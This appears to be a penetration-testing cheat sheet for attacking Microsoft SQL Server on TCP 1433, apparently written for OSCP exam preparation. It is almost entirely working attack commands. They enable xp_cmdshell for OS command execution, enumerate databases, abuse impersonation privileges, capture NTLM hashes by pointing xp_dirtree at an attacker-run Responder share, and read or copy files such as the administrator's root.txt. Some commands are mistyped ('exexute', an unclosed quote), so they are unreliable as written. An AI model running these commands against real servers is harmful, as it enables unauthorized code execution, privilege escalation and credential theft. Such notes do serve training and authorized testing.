📡

MSSQL (Tcp 1433)

Notes from oscp.adot8.com — services.

#services#adot8
source · oscp.adot8.com · services/mssql-less-than-tcp-1433-greater-than

MSSQL <tcp 1433>

code
01netexec mssql 10.10.10.101 -d domain -u adot8 -p password -x "whoami"
<pre><code><strong>mssqlclient.py -p 1433 domain.local/adot8:password@10.10.10.101 -windows-auth </strong></code></pre>

Configure xp_cmdshell

code
01sp_configure 'show advanced options', '1';
02RECONFIGURE;
03sp_configure 'xp_cmdshell', '1';
04RECONFIGURE;
05xp_cmdshell 'whoami;
<pre><code><strong>exexute sp_configure 'show advanced options', '1'; </strong>RECONFIGURE; exexute sp_configure 'xp_cmdshell', '1'; RECONFIGURE; exexute xp_cmdshell 'whoami; </code></pre>

Enumeration

<pre><code>select @@version; <strong>SELECT name FROM sys.databases; </strong>SELECT name FROM master..sysdatabases; USE adot8; SELECT * FROM &#x3C;databaseName>.INFORMATION_SCHEMA.TABLES; SELECT name FROM &#x3C;databaseName>..sysobjects WHERE xtype = 'U'; &#x3C;-- find users table select * from &#x3C;databaseName>.dbo.users; select * from &#x3C;databaseName>..users; </code></pre>

Impersonate a user

code
01SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
<pre><code><strong>enum_impersonate </strong>exec_as_user &#x3C;grantor> exec_as_login &#x3C;grantor> </code></pre>

Capture hash

code
01sudo responder -I tun0
02xp_dirtree \\10.10.14.3\adot8\

Read a file

code
01select x from OpenRowset(BULK 'C:\Users\Administrator\root.txt',SINGLE_CLOB) R(x)

Copy a file

code
01create table #errortable (ignore int)
code
01bulk insert #errortable from '\\localhost\c$\windows\win.ini' with ( fieldterminator=',', rowterminator='\n', errorfile='c:\thatjusthappend.txt' )